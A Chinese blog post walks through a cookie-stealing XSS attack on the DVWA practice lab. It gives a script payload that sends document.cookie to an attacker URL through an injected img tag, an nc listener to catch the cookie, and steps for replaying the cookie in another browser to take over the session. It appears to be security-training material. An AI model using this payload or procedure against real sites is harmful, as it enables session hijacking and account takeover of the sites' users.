首页 > 其他分享 >XSS cookie伪造攻击

XSS cookie伪造攻击

时间:2023-06-13 14:46:05浏览次数:39  
标签:XSS 请求 端口 cookie location document 伪造 页面

环境

系统:windows 7

靶场:DVWA

场景:chrome对firefox的个人cookie盗用伪造

IP:192.168.98.128

端口:未占用的任意端口

实施

1.首先确保firefox登录状态,即存在cookie

2.构造获取cookie的js请求脚本

<script>
    document.write(    
        '<img src="url'+
         document.cookie+
        '"/>'    
    //利用img标签特性,生成src的GET请求并获取请求页面cookie,然后作为图片去展示;    
    );
//通过document.write写到网页中来-执行img标签-去触发指令-生成一个含cookie的GET请求
</script>
//因为src=“”中引号内容只会作为数据字符串进行展示,所以需引进script脚本去执行document.cookie。对标签和执行内容进行‘单引号’分隔和【数据+指令+数据】的拼接

原理:构造一个访问请求来盗取浏览器页面的cookie

3.提交执行脚本

在任意输入框进行提交,注意绕过前端输入长度限制

4.进行nc端口监听

nc  -lp  8011

 注:此处须保持与构造请求的端口一致!!

5.替换cookie实现伪造盗用

  • 1.打开chrome浏览器访问DVWA
  • 2.找到页面cookie信息
  • 3.进行cookie值的替换

6.实现登录

此处并不是直接刷新页面,因为其登录页面是固定的,我们要通过cookie的盗用直接获取其登录状态,因此此处访问的应该是首页

http://127.0.0.1:8082

 可以看到成功进入DVWA的页面,攻击完成。

TRANSLATE with x English
Arabic Hebrew Polish
Bulgarian Hindi Portuguese
Catalan Hmong Daw Romanian
Chinese Simplified Hungarian Russian
Chinese Traditional Indonesian Slovak
Czech Italian Slovenian
Danish Japanese Spanish
Dutch Klingon Swedish
English Korean Thai
Estonian Latvian Turkish
Finnish Lithuanian Ukrainian
French Malay Urdu
German Maltese Vietnamese
Greek Norwegian Welsh
Haitian Creole Persian  
  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back

标签:XSS,请求,端口,cookie,location,document,伪造,页面
From: https://www.cnblogs.com/Wizo-WLsecTeam/p/17477437.html

相关文章

  • Session 与 Cookie
    评:HTTP协议(超文本传输协议)是无状态的,不能保存客户端与服务器之间通讯(交互)的信息。打个比方,拿最常见的登录来说,现在好多网站的操作都需要用户登录,假如在a操作时,用户成功登录系统,再进行b操作时,由于HTTP协议是无状态的,用户之前登录的信息并没有被......
  • Java 利用POI对象 SXSSFWorkbook 导出Excel
    最开始调用的方法是(标记的地方): workbook=newHSSFWorkbook();和workbook=newXSSFWorkbook();这两个方法就是导出Excel的最关键的方法,接下来我来说说这两个方法作用:1.HSSFWorkbook:是操作Excel2003以前(包括2003)的版本,扩展名是.xls;2.XSSFWorkbook:是操作Excel2007的版本......
  • [ABC305C] Snuke the Cookie Picker题解
    题目大意有一个\(H\timesW\)的网格,一种有一个矩形,矩形中间有一个点被挖空,求这个点的坐标。(.表示空白,#表示矩形内的点)解析观察我们可以发现,每一矩形内的个点上下左右至少会有两个是#。如图:而每一个在矩形外的点上下左右最多只有一个#。所以我们只需要找的一个.的上......
  • Java 实战介绍 Cookie 和 Session 的区别
    HTTP是一种不保存状态的协议,即无状态协议,HTTP协议不会保存请求和响应之间的通信状态,协议对于发送过的请求和响应都不会做持久化处理。无状态协议减少了对服务压力,如果一个服务器需要处理百万级用户的请求状态,对服务器的压力无疑的是巨大的。无状态的HTTP由于其简单和易用性......
  • 数据存储的两种方式:cookie和webStorage存储
    一、sessionstorage(会话存储)1、添加数据:SessionStorage.setItem('key','value');该方法接受一个键和值作为参数,会把键值对添加到存储中,如果键名存在,则更新其对应的值。2、获取数据:SessionStorage.getItem('key');该方法接受一个键名作为参数,返回键名对应的值。如果获取不到......
  • 记录--详解 XSS(跨站脚本攻击)
    这里给大家分享我在网上总结出来的一些知识,希望对大家有所帮助前言:我们知道同源策略可以隔离各个站点之间的DOM交互、页面数据和网络通信,虽然严格的同源策略会带来更多的安全,但是也束缚了Web。这就需要在安全和自由之间找到一个平衡点,所以我们默认页面中可以引用任意第三方......
  • vue之elementui使用, vuex使用, Router使用, localstorage和sessionstorage,和cookie
    目录一、elementui使用下载插件vue界的ui库二、vuex的使用1.概念2.何时使用?3、使用步骤:三、Router使用1简单使用2组件中实现页面跳转3路由跳转时,可以使用对象4this.router的一些方法四、多级路由五、路由守卫和两种工作模式路由守卫路由器的两种工作模式六、localstorage和se......
  • cookie 和session的区别
    1、对象不同cookie:是针对每个网站的信息,每个网站只能对应一个,其他网站无法访问,这个文件保存在客户端,每次您拨打相应网站,浏览器都会查找该网站的cookies,如果有,则会将该文件发送出去。cookies文件的内容大致上包括了诸如用户名、密码、设置等信息。session:是针对每个用户的,只有客......
  • Vue——vuex使用、Router使用、localstorage、sessionstorage和cookie
    vuex使用#vuex:状态管理器---》存数据(变量)的地方,所有组件都可以操作在Vue中实现集中式状态(数据)管理的一个Vue插件,对vue应用中多个组件的共享状态进行集中式的管理(读/写),也是一种组件间通信的方式,且适用于任意组件间通信<h1>1vuex的使用基本使用(操作state的数据)</h1>......
  • .NET代码审计XSS篇-Html.Raw
    在.NETMVC项目中,默认创建的视图,都是以cshtml为后缀的Razor视图,这种视图通常以.cshtml文件扩展名,Razor视图引擎对自动对输出的内容进行HTML编码,这些字符会被编码成HTML实体,如图1如果确实某些场景需要在视图中显示原始HTML内容,而不进行HTML编码,可以使用Html.Raw方法。Html.Raw标......